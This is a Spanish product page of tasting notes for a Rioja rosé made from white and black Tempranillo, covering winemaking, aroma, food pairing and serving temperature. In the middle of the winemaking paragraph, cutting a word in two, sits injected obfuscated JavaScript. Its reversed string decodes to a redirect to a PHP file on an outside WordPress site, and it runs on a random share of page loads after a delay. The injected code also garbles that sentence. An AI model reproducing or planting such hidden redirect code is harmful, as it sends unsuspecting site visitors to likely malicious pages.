MASTER EDITION RIOJA

ARABARTE ROSADO


NOTAS DE CATA


VARIEDAD DE UVA

Único y muy especial vino, elaborado en base a la variedad de uva Tempranillo, en sus dos versiones, blanca y negra.

 

VINIFICACIÓN

Maceración de las uvas tempranillo blanco y negro, al estilo de los tintos. Fermentación completa en depósitos de acero inoxidable, separ$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando, en el sangrado, la lágrima, del vino de prensa.

 

NOTA DE CATA

Color rosa frambuesa, con ribetes dorados, capa muy baja y brillante, nariz frutal, picota, cereza, frutos rojos con notas florales de fondo características del tempranillo.
En boca, muy fresco, limpio con buena acidez, de trago muy largo y elegante.

 

MARIDAJE

Verduras, ensaladas y sobretodo con pasta y arroz.

 

TEMPERATURA DE CONSUMO

Consumir a temperaturas bajas 6-10º

 

GRADO ALCOHÓLICO

13% Vol.